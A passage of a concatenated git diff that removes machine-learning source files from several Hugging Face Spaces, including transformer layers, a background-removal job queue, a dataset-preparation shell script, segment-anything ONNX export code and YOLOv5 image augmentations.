self.embed_positions(src_tokens) - if self.layernorm_embedding: - x = self.layernorm_embedding(x) - x = F.dropout(x, p=self.dropout, training=self.training) - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - # compute padding mask - encoder_padding_mask = src_tokens.eq(self.padding_idx) - return (x, encoder_padding_mask, prev_output_tokens) - - -class TransformerEncoderLayerNorm(nn.Module): - """ - Layer norm at the the end of all encoder layers if - args.encoder_enormalize_before = True - """ - - def __init__(self, args, embed_dim): - super().__init__() - if args.encoder_normalize_before: - self.layer_norm = LayerNorm(embed_dim) - else: - self.layer_norm = None - - def forward(self, input): - x = input[0] - encoder_padding_mask = input[1] - prev_output_tokens = input[2] - if self.layer_norm: - x = self.layer_norm(x) - # keeping track of the incremental_state is not supported yet - return (x, encoder_padding_mask, prev_output_tokens) - - -class TransformerDecoderEmbedding(nn.Module): - """ Decoder Embedding + Positional Embedding """ - - def __init__(self, args, embed_tokens): - super().__init__() - self.dropout = args.dropout - self.share_input_output_embed = args.share_decoder_input_output_embed - input_embed_dim = ( - sum(e.embedding_dim for e in embed_tokens) - if isinstance(embed_tokens, nn.ModuleList) - else embed_tokens.embedding_dim - ) - embed_dim = args.decoder_embed_dim - self.output_embed_dim = args.decoder_output_dim - - padding_idx = ( - embed_tokens[0].padding_idx - if isinstance(embed_tokens, nn.ModuleList) - else embed_tokens.padding_idx - ) - self.max_target_positions = args.max_target_positions - - self.embed_tokens = embed_tokens - self.embed_scale = math.sqrt(embed_dim) # todo: try with input_embed_dim - - self.project_in_dim = ( - Linear(input_embed_dim, embed_dim, bias=False) - if embed_dim != input_embed_dim - else None - ) - - self.embed_positions = ( - PositionalEmbedding( - args.max_target_positions, - embed_dim, - padding_idx, - learned=args.decoder_learned_pos, - ) - if not args.no_token_positional_embeddings - else None - ) - - def forward(self, input): - mt_task = False - if isinstance(input, tuple): - if len(input) == 3: - encoder_out = input[0] - encoder_padding_mask = input[1] - prev_output_tokens = input[2] - incremental_state = None # Hardcoding to avoid passing of None objects - mt_task = True - else: - # HACK for now, need to fix (TODO sidgoyal) - prev_output_tokens = input[0] - # discard "src_lengths" - encoder_out = None - encoder_padding_mask = None - incremental_state = None - - else: - prev_output_tokens = input - encoder_out = None - encoder_padding_mask = None - incremental_state = None - - positions = ( - self.embed_positions( - prev_output_tokens, - incremental_state=incremental_state, - ) - if self.embed_positions is not None - else None - ) - - if incremental_state is not None: - prev_output_tokens = prev_output_tokens[:, -1:] - if positions is not None: - positions = positions[:, -1:] - - # embed tokens and positions - - if isinstance(self.embed_tokens, nn.ModuleList): - x_embed_list = [] - for embed_tokens_part in self.embed_tokens: - x_embed_list.append(embed_tokens_part(prev_output_tokens)) - - x = self.embed_scale * torch.cat(x_embed_list, dim=-1) - else: - x = self.embed_scale * self.embed_tokens(prev_output_tokens) - - if self.project_in_dim is not None: - x = self.project_in_dim(x) - - if positions is not None: - x += positions - x = F.dropout(x, p=self.dropout, training=self.training) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - if mt_task: - return (x, encoder_out, encoder_padding_mask) - return x - - -class TransformerDecoderOutputLayer(nn.Module): - def __init__(self, args, embed_tokens, dictionary): - super().__init__() - self.share_input_output_embed = args.share_decoder_input_output_embed - self.embed_tokens = embed_tokens - self.output_embed_dim = args.decoder_output_dim - embed_dim = args.decoder_embed_dim - - self.project_out_dim = ( - Linear(embed_dim, self.output_embed_dim, bias=False) - if embed_dim != self.output_embed_dim and not args.tie_adaptive_weights - else None - ) - self.adaptive_softmax = None - if args.adaptive_softmax_cutoff is not None: - assert not isinstance(embed_tokens, nn.ModuleList) - self.adaptive_softmax = AdaptiveSoftmax( - len(dictionary), - self.output_embed_dim, - options.eval_str_list(args.adaptive_softmax_cutoff, type=int), - dropout=args.adaptive_softmax_dropout, - adaptive_inputs=embed_tokens if args.tie_adaptive_weights else None, - factor=args.adaptive_softmax_factor, - tie_proj=args.tie_adaptive_proj, - ) - elif not self.share_input_output_embed: - self.embed_tokens = nn.Parameter( - torch.Tensor(len(dictionary), self.output_embed_dim) - ) - nn.init.normal_( - self.embed_tokens, mean=0, std=self.output_embed_dim ** -0.5 - ) - - if args.decoder_normalize_before and not getattr( - args, "no_decoder_final_norm", False - ): - self.layer_norm = LayerNorm(embed_dim) - else: - self.layer_norm = None - - def forward(self, input, apply_final_proj=True): - if isinstance(input, tuple): - x = input[0] - else: - x = input - - if self.layer_norm: - x = self.layer_norm(x) - - # T x B x C -> B x T x C - x = x.transpose(0, 1) - - if self.project_out_dim is not None: - x = self.project_out_dim(x) - if apply_final_proj: - x = self.output_layer(x) - return x - - def output_layer(self, features, **kwargs): - """Project features to the vocabulary size.""" - if self.adaptive_softmax is None: - # project back to size of vocabulary - if self.share_input_output_embed: - if isinstance(self.embed_tokens, nn.ModuleList): - output = None - for i, emb in enumerate(self.embed_tokens): - sidx = i * emb.embedding_dim - eidx = (i + 1) * emb.embedding_dim - if output is None: - output = F.linear(features[:, :, sidx:eidx], emb.weight) - else: - output += F.linear(features[:, :, sidx:eidx], emb.weight) - - return output - else: - return F.linear(features, self.embed_tokens.weight) - else: - return F.linear(features, self.embed_tokens) - else: - return features - - -class TransformerEncoderLayer(nn.Module): - """Encoder layer block. - In the original paper each operation (multi-head attention or FFN) is - postprocessed with: `dropout -> add residual -> layernorm`. In the - tensor2tensor code they suggest that learning is more robust when - preprocessing each layer with layernorm and postprocessing with: - `dropout -> add residual`. We default to the approach in the paper, but the - tensor2tensor approach can be enabled by setting - *args.encoder_normalize_before* to ``True``. - - Args: - args (argparse.Namespace): parsed command-line arguments - """ - - def __init__(self, args): - super().__init__() - self.embed_dim = args.encoder_embed_dim - self.self_attn = MultiheadAttention( - self.embed_dim, - args.encoder_attention_heads, - dropout=args.attention_dropout, - self_attention=True, - ) - self.self_attn_layer_norm = LayerNorm(self.embed_dim) - self.dropout = args.dropout - self.activation_fn = utils.get_activation_fn( - activation=getattr(args, "activation_fn", "relu") - ) - self.activation_dropout = getattr(args, "activation_dropout", 0) - if self.activation_dropout == 0: - # for backwards compatibility with models that use args.relu_dropout - self.activation_dropout = getattr(args, "relu_dropout", 0) - self.normalize_before = args.encoder_normalize_before - self.fc1 = Linear(self.embed_dim, args.encoder_ffn_embed_dim) - self.fc2 = Linear(args.encoder_ffn_embed_dim, self.embed_dim) - self.final_layer_norm = LayerNorm(self.embed_dim) - - def upgrade_state_dict_named(self, state_dict, name): - """ - Rename layer norm states from `...layer_norms.0.weight` to - `...self_attn_layer_norm.weight` and `...layer_norms.1.weight` to - `...final_layer_norm.weight` - """ - layer_norm_map = {"0": "self_attn_layer_norm", "1": "final_layer_norm"} - for old, new in layer_norm_map.items(): - for m in ("weight", "bias"): - k = "{}.layer_norms.{}.{}".format(name, old, m) - if k in state_dict: - state_dict["{}.{}.{}".format(name, new, m)] = state_dict[k] - del state_dict[k] - - def forward(self, input): - """ - Args: - input (Tuple): - input[0] (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)` - input[1] (ByteTensor/FloatTensor): encoder padding mask - - binary ByteTensor of shape `(batch, src_len)` where padding elements - are indicated by ``1``. - input[2] (LongTensor): previous decoder outputs of shape - `(batch, tgt_len)`, for teacher forcing) - Returns: - output (Tuple): - output[0] (Tensor): encoded output of shape `(batch, src_len, embed_dim)` - output[1] (ByteTensor/FloatTensor): encoder padding mask - output[2] (LongTensor): previous decoder outputs - """ - x = input[0] - encoder_padding_mask = input[1] - prev_output_tokens = input[2] - residual = x - x = self.maybe_layer_norm(self.self_attn_layer_norm, x, before=True) - x, _ = self.self_attn( - query=x, key=x, value=x, key_padding_mask=encoder_padding_mask - ) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.self_attn_layer_norm, x, after=True) - - residual = x - x = self.maybe_layer_norm(self.final_layer_norm, x, before=True) - x = self.activation_fn(self.fc1(x)) - x = F.dropout(x, p=self.activation_dropout, training=self.training) - x = self.fc2(x) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.final_layer_norm, x, after=True) - return (x, encoder_padding_mask, prev_output_tokens) - - def maybe_layer_norm(self, layer_norm, x, before=False, after=False): - assert before ^ after - if after ^ self.normalize_before: - return layer_norm(x) - else: - return x - - -class TransformerDecoderLayer(nn.Module): - """Decoder layer block. - - In the original paper each operation (multi-head attention, encoder - attention or FFN) is postprocessed with: `dropout -> add residual -> - layernorm`. In the tensor2tensor code they suggest that learning is more - robust when preprocessing each layer with layernorm and postprocessing with: - `dropout -> add residual`. We default to the approach in the paper, but the - tensor2tensor approach can be enabled by setting - *args.decoder_normalize_before* to ``True``. - - Args: - args (argparse.Namespace): parsed command-line arguments - no_encoder_attn (bool, optional): whether to attend to encoder outputs - (default: False). - """ - - def __init__( - self, args, no_encoder_attn=False, add_bias_kv=False, add_zero_attn=False - ): - super().__init__() - self.embed_dim = args.decoder_embed_dim - self.self_attn = MultiheadAttention( - embed_dim=self.embed_dim, - num_heads=args.decoder_attention_heads, - dropout=args.attention_dropout, - add_bias_kv=add_bias_kv, - add_zero_attn=add_zero_attn, - self_attention=True, - ) - self.dropout = args.dropout - self.activation_fn = utils.get_activation_fn( - activation=getattr(args, "activation_fn", "relu") - ) - self.activation_dropout = getattr(args, "activation_dropout", 0) - if self.activation_dropout == 0: - # for backwards compatibility with models that use args.relu_dropout - self.activation_dropout = getattr(args, "relu_dropout", 0) - self.normalize_before = args.decoder_normalize_before - - # use layerNorm rather than FusedLayerNorm for exporting. - # char_inputs can be used to determint this. - # TODO remove this once we update apex with the fix - export = getattr(args, "char_inputs", False) - self.self_attn_layer_norm = LayerNorm(self.embed_dim, export=export) - - if no_encoder_attn: - self.encoder_attn = None - self.encoder_attn_layer_norm = None - else: - self.encoder_attn = MultiheadAttention( - self.embed_dim, - args.decoder_attention_heads, - kdim=getattr(args, "encoder_embed_dim", None), - vdim=getattr(args, "encoder_embed_dim", None), - dropout=args.attention_dropout, - encoder_decoder_attention=True, - ) - self.encoder_attn_layer_norm = LayerNorm(self.embed_dim, export=export) - - self.fc1 = Linear(self.embed_dim, args.decoder_ffn_embed_dim) - self.fc2 = Linear(args.decoder_ffn_embed_dim, self.embed_dim) - - self.final_layer_norm = LayerNorm(self.embed_dim, export=export) - self.need_attn = True - - self.onnx_trace = False - - def prepare_for_onnx_export_(self): - self.onnx_trace = True - - def forward(self, input): - """ - Args: - input (Tuple): - input[0] (Tensor): input to the layer of shape `(seq_len, batch, embed_dim)` - input[1] (Tensor): encoder output of shape `(batch, src_len, embed_dim)` - input[2] (ByteTensor/FloatTensor): encoder padding mask - - binary ByteTensor of shape `(batch, src_len)` where padding elements - are indicated by ``1``. - Returns: - output (Tuple): - output[0] (Tensor): encoded output of shape `(batch, src_len, embed_dim)` - output[1] (ByteTensor/FloatTensor): encoder padding mask - output[2] (LongTensor): previous decoder outputs - """ - # Note: incremental state is not yet supported - mt_task = False - if isinstance(input, tuple): - x = input[0] - encoder_out = input[1] - encoder_padding_mask = input[2] - incremental_state = None - mt_task = True - else: - x = input - encoder_out = None - encoder_padding_mask = None - incremental_state = None - - if incremental_state is None: - self_attn_mask = self.buffered_future_mask(x) - else: - self_attn_mask = None - - # TODO: add back prev_self_attn_state, prev_attn_state, - # self_attn_padding_mask - prev_self_attn_state = None - prev_attn_state = None - self_attn_padding_mask = None - - residual = x - x = self.maybe_layer_norm(self.self_attn_layer_norm, x, before=True) - if prev_self_attn_state is not None: - if incremental_state is None: - incremental_state = {} - prev_key, prev_value = prev_self_attn_state - saved_state = {"prev_key": prev_key, "prev_value": prev_value} - self.self_attn._set_input_buffer(incremental_state, saved_state) - x, attn = self.self_attn( - query=x, - key=x, - value=x, - key_padding_mask=self_attn_padding_mask, - incremental_state=incremental_state, - need_weights=False, - attn_mask=self_attn_mask, - ) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.self_attn_layer_norm, x, after=True) - - if self.encoder_attn is not None: - residual = x - x = self.maybe_layer_norm(self.encoder_attn_layer_norm, x, before=True) - if prev_attn_state is not None: - if incremental_state is None: - incremental_state = {} - prev_key, prev_value = prev_attn_state - saved_state = {"prev_key": prev_key, "prev_value": prev_value} - self.encoder_attn._set_input_buffer(incremental_state, saved_state) - x, attn = self.encoder_attn( - query=x, - key=encoder_out, - value=encoder_out, - key_padding_mask=encoder_padding_mask, - incremental_state=incremental_state, - static_kv=True, - need_weights=(not self.training and self.need_attn), - ) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.encoder_attn_layer_norm, x, after=True) - - residual = x - x = self.maybe_layer_norm(self.final_layer_norm, x, before=True) - x = self.activation_fn(self.fc1(x)) - x = F.dropout(x, p=self.activation_dropout, training=self.training) - x = self.fc2(x) - x = F.dropout(x, p=self.dropout, training=self.training) - x = residual + x - x = self.maybe_layer_norm(self.final_layer_norm, x, after=True) - - if mt_task: - return (x, encoder_out, encoder_padding_mask) - return x - - def buffered_future_mask(self, tensor): - dim = tensor.size(0) - if ( - not hasattr(self, "_future_mask") - or self._future_mask is None - or self._future_mask.device != tensor.device - ): - self._future_mask = torch.triu( - utils.fill_with_neg_inf(tensor.new(dim, dim)), 1 - ) - if self._future_mask.size(0) < dim: - self._future_mask = torch.triu( - utils.fill_with_neg_inf(self._future_mask.resize_(dim, dim)), 1 - ) - return self._future_mask[:dim, :dim] - - def maybe_layer_norm(self, layer_norm, x, before=False, after=False): - assert before ^ after - if after ^ self.normalize_before: - return layer_norm(x) - else: - return x - - def make_generation_fast_(self, need_attn=False, **kwargs): - self.need_attn = need_attn - - -def Embedding(num_embeddings, embedding_dim, padding_idx): - m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) - nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5) - nn.init.constant_(m.weight[padding_idx], 0) - return m - - -def Linear(in_features, out_features, bias=True): - m = nn.Linear(in_features, out_features, bias) - nn.init.xavier_uniform_(m.weight) - if bias: - nn.init.constant_(m.bias, 0.0) - return m diff --git a/spaces/mygyasir/fast_diffusion/style.css b/spaces/mygyasir/fast_diffusion/style.css deleted file mode 100644 index 03d1292739ba897b789ded3d0b2be2d2bd266b8f..0000000000000000000000000000000000000000 --- a/spaces/mygyasir/fast_diffusion/style.css +++ /dev/null @@ -1,5 +0,0 @@ -.gr-button { - color: white; - border-color: #000000; - background: #006699; -} \ No newline at end of file diff --git a/spaces/mygyasir/genious_bgremover/carvekit/web/utils/task_queue.py b/spaces/mygyasir/genious_bgremover/carvekit/web/utils/task_queue.py deleted file mode 100644 index f821434fcbfc3a94128bee1d1406c6826884f6a9..0000000000000000000000000000000000000000 --- a/spaces/mygyasir/genious_bgremover/carvekit/web/utils/task_queue.py +++ /dev/null @@ -1,114 +0,0 @@ -import gc -import threading -import time -import uuid -from typing import Optional - -from loguru import logger - -from carvekit.api.interface import Interface -from carvekit.web.schemas.config import WebAPIConfig -from carvekit.web.utils.init_utils import init_interface -from carvekit.web.other.removebg import process_remove_bg - - -class MLProcessor(threading.Thread): - """Simple ml task queue processor""" - - def __init__(self, api_config: WebAPIConfig): - super().__init__() - self.api_config = api_config - self.interface: Optional[Interface] = None - self.jobs = {} - self.completed_jobs = {} - - def run(self): - """Starts listening for new jobs.""" - unused_completed_jobs_timer = time.time() - if self.interface is None: - self.interface = init_interface(self.api_config) - while True: - # Clear unused completed jobs every hour - if time.time() - unused_completed_jobs_timer > 60: - self.clear_old_completed_jobs() - unused_completed_jobs_timer = time.time() - - if len(self.jobs.keys()) >= 1: - id = list(self.jobs.keys())[0] - data = self.jobs[id] - # TODO add pydantic scheme here - response = process_remove_bg( - self.interface, data[0], data[1], data[2], data[3] - ) - self.completed_jobs[id] = [response, time.time()] - try: - del self.jobs[id] - except KeyError or NameError as e: - logger.error(f"Something went wrong with Task Queue: {str(e)}") - gc.collect() - else: - time.sleep(1) - continue - - def clear_old_completed_jobs(self): - """Clears old completed jobs""" - - if len(self.completed_jobs.keys()) >= 1: - for job_id in self.completed_jobs.keys(): - job_finished_time = self.completed_jobs[job_id][1] - if time.time() - job_finished_time > 3600: - try: - del self.completed_jobs[job_id] - except KeyError or NameError as e: - logger.error(f"Something went wrong with Task Queue: {str(e)}") - gc.collect() - - def job_status(self, id: str) -> str: - """ - Returns current job status - - Args: - id: id of the job - - Returns: - Current job status for specified id. Job status can be [finished, wait, not_found] - """ - if id in self.completed_jobs.keys(): - return "finished" - elif id in self.jobs.keys(): - return "wait" - else: - return "not_found" - - def job_result(self, id: str): - """ - Returns job processing result. - - Args: - id: id of the job - - Returns: - job processing result. - """ - if id in self.completed_jobs.keys(): - data = self.completed_jobs[id][0] - try: - del self.completed_jobs[id] - except KeyError or NameError: - pass - return data - else: - return False - - def job_create(self, data: list): - """ - Send job to ML Processor - - Args: - data: data object - """ - if self.is_alive() is False: - self.start() - id = uuid.uuid4().hex - self.jobs[id] = data - return id diff --git a/spaces/myrad01/Inpaint-Anything/third_party/lama/fetch_data/places_standard_evaluation_prepare_data.sh b/spaces/myrad01/Inpaint-Anything/third_party/lama/fetch_data/places_standard_evaluation_prepare_data.sh deleted file mode 100644 index 2962ac8c843c84a467679887cb4aab60bd73917a..0000000000000000000000000000000000000000 --- a/spaces/myrad01/Inpaint-Anything/third_party/lama/fetch_data/places_standard_evaluation_prepare_data.sh +++ /dev/null @@ -1,52 +0,0 @@ -# 0. folder preparation -mkdir -p places_standard_dataset/evaluation/hires/ -mkdir -p places_standard_dataset/evaluation/random_thick_512/ -mkdir -p places_standard_dataset/evaluation/random_thin_512/ -mkdir -p places_standard_dataset/evaluation/random_medium_512/ -mkdir -p places_standard_dataset/evaluation/random_thick_256/ -mkdir -p places_standard_dataset/evaluation/random_thin_256/ -mkdir -p places_standard_dataset/evaluation/random_medium_256/ - -# 1. sample 30000 new images -OUT=$(python3 fetch_data/eval_sampler.py) -echo ${OUT} - -FILELIST=$(cat places_standard_dataset/original/eval_random_files.txt) -for i in $FILELIST -do - $(cp ${i} places_standard_dataset/evaluation/hires/) -done - - -# 2. generate all kinds of masks - -# all 512 -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_thick_512.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_thick_512/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_thin_512.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_thin_512/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_medium_512.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_medium_512/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_thick_256.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_thick_256/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_thin_256.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_thin_256/ - -python3 bin/gen_mask_dataset.py \ -$(pwd)/configs/data_gen/random_medium_256.yaml \ -places_standard_dataset/evaluation/hires \ -places_standard_dataset/evaluation/random_medium_256/ diff --git a/spaces/myrad01/Inpaint-Anything/third_party/segment-anything/segment_anything/utils/onnx.py b/spaces/myrad01/Inpaint-Anything/third_party/segment-anything/segment_anything/utils/onnx.py deleted file mode 100644 index 3196bdf4b782e6eeb3da4ad66ef3c7b1741535fe..0000000000000000000000000000000000000000 --- a/spaces/myrad01/Inpaint-Anything/third_party/segment-anything/segment_anything/utils/onnx.py +++ /dev/null @@ -1,144 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. - -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -import torch -import torch.nn as nn -from torch.nn import functional as F - -from typing import Tuple - -from ..modeling import Sam -from .amg import calculate_stability_score - - -class SamOnnxModel(nn.Module): - """ - This model should not be called directly, but is used in ONNX export. - It combines the prompt encoder, mask decoder, and mask postprocessing of Sam, - with some functions modified to enable model tracing. Also supports extra - options controlling what information. See the ONNX export script for details. - """ - - def __init__( - self, - model: Sam, - return_single_mask: bool, - use_stability_score: bool = False, - return_extra_metrics: bool = False, - ) -> None: - super().__init__() - self.mask_decoder = model.mask_decoder - self.model = model - self.img_size = model.image_encoder.img_size - self.return_single_mask = return_single_mask - self.use_stability_score = use_stability_score - self.stability_score_offset = 1.0 - self.return_extra_metrics = return_extra_metrics - - @staticmethod - def resize_longest_image_size( - input_image_size: torch.Tensor, longest_side: int - ) -> torch.Tensor: - input_image_size = input_image_size.to(torch.float32) - scale = longest_side / torch.max(input_image_size) - transformed_size = scale * input_image_size - transformed_size = torch.floor(transformed_size + 0.5).to(torch.int64) - return transformed_size - - def _embed_points(self, point_coords: torch.Tensor, point_labels: torch.Tensor) -> torch.Tensor: - point_coords = point_coords + 0.5 - point_coords = point_coords / self.img_size - point_embedding = self.model.prompt_encoder.pe_layer._pe_encoding(point_coords) - point_labels = point_labels.unsqueeze(-1).expand_as(point_embedding) - - point_embedding = point_embedding * (point_labels != -1) - point_embedding = point_embedding + self.model.prompt_encoder.not_a_point_embed.weight * ( - point_labels == -1 - ) - - for i in range(self.model.prompt_encoder.num_point_embeddings): - point_embedding = point_embedding + self.model.prompt_encoder.point_embeddings[ - i - ].weight * (point_labels == i) - - return point_embedding - - def _embed_masks(self, input_mask: torch.Tensor, has_mask_input: torch.Tensor) -> torch.Tensor: - mask_embedding = has_mask_input * self.model.prompt_encoder.mask_downscaling(input_mask) - mask_embedding = mask_embedding + ( - 1 - has_mask_input - ) * self.model.prompt_encoder.no_mask_embed.weight.reshape(1, -1, 1, 1) - return mask_embedding - - def mask_postprocessing(self, masks: torch.Tensor, orig_im_size: torch.Tensor) -> torch.Tensor: - masks = F.interpolate( - masks, - size=(self.img_size, self.img_size), - mode="bilinear", - align_corners=False, - ) - - prepadded_size = self.resize_longest_image_size(orig_im_size, self.img_size).to(torch.int64) - masks = masks[..., : prepadded_size[0], : prepadded_size[1]] # type: ignore - - orig_im_size = orig_im_size.to(torch.int64) - h, w = orig_im_size[0], orig_im_size[1] - masks = F.interpolate(masks, size=(h, w), mode="bilinear", align_corners=False) - return masks - - def select_masks( - self, masks: torch.Tensor, iou_preds: torch.Tensor, num_points: int - ) -> Tuple[torch.Tensor, torch.Tensor]: - # Determine if we should return the multiclick mask or not from the number of points. - # The reweighting is used to avoid control flow. - score_reweight = torch.tensor( - [[1000] + [0] * (self.model.mask_decoder.num_mask_tokens - 1)] - ).to(iou_preds.device) - score = iou_preds + (num_points - 2.5) * score_reweight - best_idx = torch.argmax(score, dim=1) - masks = masks[torch.arange(masks.shape[0]), best_idx, :, :].unsqueeze(1) - iou_preds = iou_preds[torch.arange(masks.shape[0]), best_idx].unsqueeze(1) - - return masks, iou_preds - - @torch.no_grad() - def forward( - self, - image_embeddings: torch.Tensor, - point_coords: torch.Tensor, - point_labels: torch.Tensor, - mask_input: torch.Tensor, - has_mask_input: torch.Tensor, - orig_im_size: torch.Tensor, - ): - sparse_embedding = self._embed_points(point_coords, point_labels) - dense_embedding = self._embed_masks(mask_input, has_mask_input) - - masks, scores = self.model.mask_decoder.predict_masks( - image_embeddings=image_embeddings, - image_pe=self.model.prompt_encoder.get_dense_pe(), - sparse_prompt_embeddings=sparse_embedding, - dense_prompt_embeddings=dense_embedding, - ) - - if self.use_stability_score: - scores = calculate_stability_score( - masks, self.model.mask_threshold, self.stability_score_offset - ) - - if self.return_single_mask: - masks, scores = self.select_masks(masks, scores, point_coords.shape[1]) - - upscaled_masks = self.mask_postprocessing(masks, orig_im_size) - - if self.return_extra_metrics: - stability_scores = calculate_stability_score( - upscaled_masks, self.model.mask_threshold, self.stability_score_offset - ) - areas = (upscaled_masks > self.model.mask_threshold).sum(-1).sum(-1) - return upscaled_masks, scores, stability_scores, areas, masks - - return upscaled_masks, scores, masks diff --git a/spaces/nakamura196/yolov5-ndl-layout/ultralytics/yolov5/utils/augmentations.py b/spaces/nakamura196/yolov5-ndl-layout/ultralytics/yolov5/utils/augmentations.py deleted file mode 100644 index 0311b97b63db29d482eac00573b1de774a974338..0000000000000000000000000000000000000000 --- a/spaces/nakamura196/yolov5-ndl-layout/ultralytics/yolov5/utils/augmentations.py +++ /dev/null @@ -1,277 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -Image augmentation functions -""" - -import math -import random - -import cv2 -import numpy as np - -from utils.general import LOGGER, check_version, colorstr, resample_segments, segment2box -from utils.metrics import bbox_ioa - - -class Albumentations: - # YOLOv5 Albumentations class (optional, only used if package is installed) - def __init__(self): - self.transform = None - try: - import albumentations as A - check_version(A.__version__, '1.0.3', hard=True) # version requirement - - self.transform = A.Compose([ - A.Blur(p=0.01), - A.MedianBlur(p=0.01), - A.ToGray(p=0.01), - A.CLAHE(p=0.01), - A.RandomBrightnessContrast(p=0.0), - A.RandomGamma(p=0.0), - A.ImageCompression(quality_lower=75, p=0.0)], - bbox_params=A.BboxParams(format='yolo', label_fields=['class_labels'])) - - LOGGER.info(colorstr('albumentations: ') + ', '.join(f'{x}' for x in self.transform.transforms if x.p)) - except ImportError: # package not installed, skip - pass - except Exception as e: - LOGGER.info(colorstr('albumentations: ') + f'{e}') - - def __call__(self, im, labels, p=1.0): - if self.transform and random.random() < p: - new = self.transform(image=im, bboxes=labels[:, 1:], class_labels=labels[:, 0]) # transformed - im, labels = new['image'], np.array([[c, *b] for c, b in zip(new['class_labels'], new['bboxes'])]) - return im, labels - - -def augment_hsv(im, hgain=0.5, sgain=0.5, vgain=0.5): - # HSV color-space augmentation - if hgain or sgain or vgain: - r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains - hue, sat, val = cv2.split(cv2.cvtColor(im, cv2.COLOR_BGR2HSV)) - dtype = im.dtype # uint8 - - x = np.arange(0, 256, dtype=r.dtype) - lut_hue = ((x * r[0]) % 180).astype(dtype) - lut_sat = np.clip(x * r[1], 0, 255).astype(dtype) - lut_val = np.clip(x * r[2], 0, 255).astype(dtype) - - im_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))) - cv2.cvtColor(im_hsv, cv2.COLOR_HSV2BGR, dst=im) # no return needed - - -def hist_equalize(im, clahe=True, bgr=False): - # Equalize histogram on BGR image 'im' with im.shape(n,m,3) and range 0-255 - yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV) - if clahe: - c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8)) - yuv[:, :, 0] = c.apply(yuv[:, :, 0]) - else: - yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram - return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB - - -def replicate(im, labels): - # Replicate labels - h, w = im.shape[:2] - boxes = labels[:, 1:].astype(int) - x1, y1, x2, y2 = boxes.T - s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels) - for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices - x1b, y1b, x2b, y2b = boxes[i] - bh, bw = y2b - y1b, x2b - x1b - yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y - x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh] - im[y1a:y2a, x1a:x2a] = im[y1b:y2b, x1b:x2b] # im4[ymin:ymax, xmin:xmax] - labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0) - - return im, labels - - -def letterbox(im, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32): - # Resize and pad image while meeting stride-multiple constraints - shape = im.shape[:2] # current shape [height, width] - if isinstance(new_shape, int): - new_shape = (new_shape, new_shape) - - # Scale ratio (new / old) - r = min(new_shape[0] / shape[0], new_shape[1] / shape[1]) - if not scaleup: # only scale down, do not scale up (for better val mAP) - r = min(r, 1.0) - - # Compute padding - ratio = r, r # width, height ratios - new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r)) - dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding - if auto: # minimum rectangle - dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding - elif scaleFill: # stretch - dw, dh = 0.0, 0.0 - new_unpad = (new_shape[1], new_shape[0]) - ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios - - dw /= 2 # divide padding into 2 sides - dh /= 2 - - if shape[::-1] != new_unpad: # resize - im = cv2.resize(im, new_unpad, interpolation=cv2.INTER_LINEAR) - top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1)) - left, right = int(round(dw - 0.1)), int(round(dw + 0.1)) - im = cv2.copyMakeBorder(im, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border - return im, ratio, (dw, dh) - - -def random_perspective(im, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, - border=(0, 0)): - # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(0.1, 0.1), scale=(0.9, 1.1), shear=(-10, 10)) - # targets = [cls, xyxy] - - height = im.shape[0] + border[0] * 2 # shape(h,w,c) - width = im.shape[1] + border[1] * 2 - - # Center - C = np.eye(3) - C[0, 2] = -im.shape[1] / 2 # x translation (pixels) - C[1, 2] = -im.shape[0] / 2 # y translation (pixels) - - # Perspective - P = np.eye(3) - P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y) - P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x) - - # Rotation and Scale - 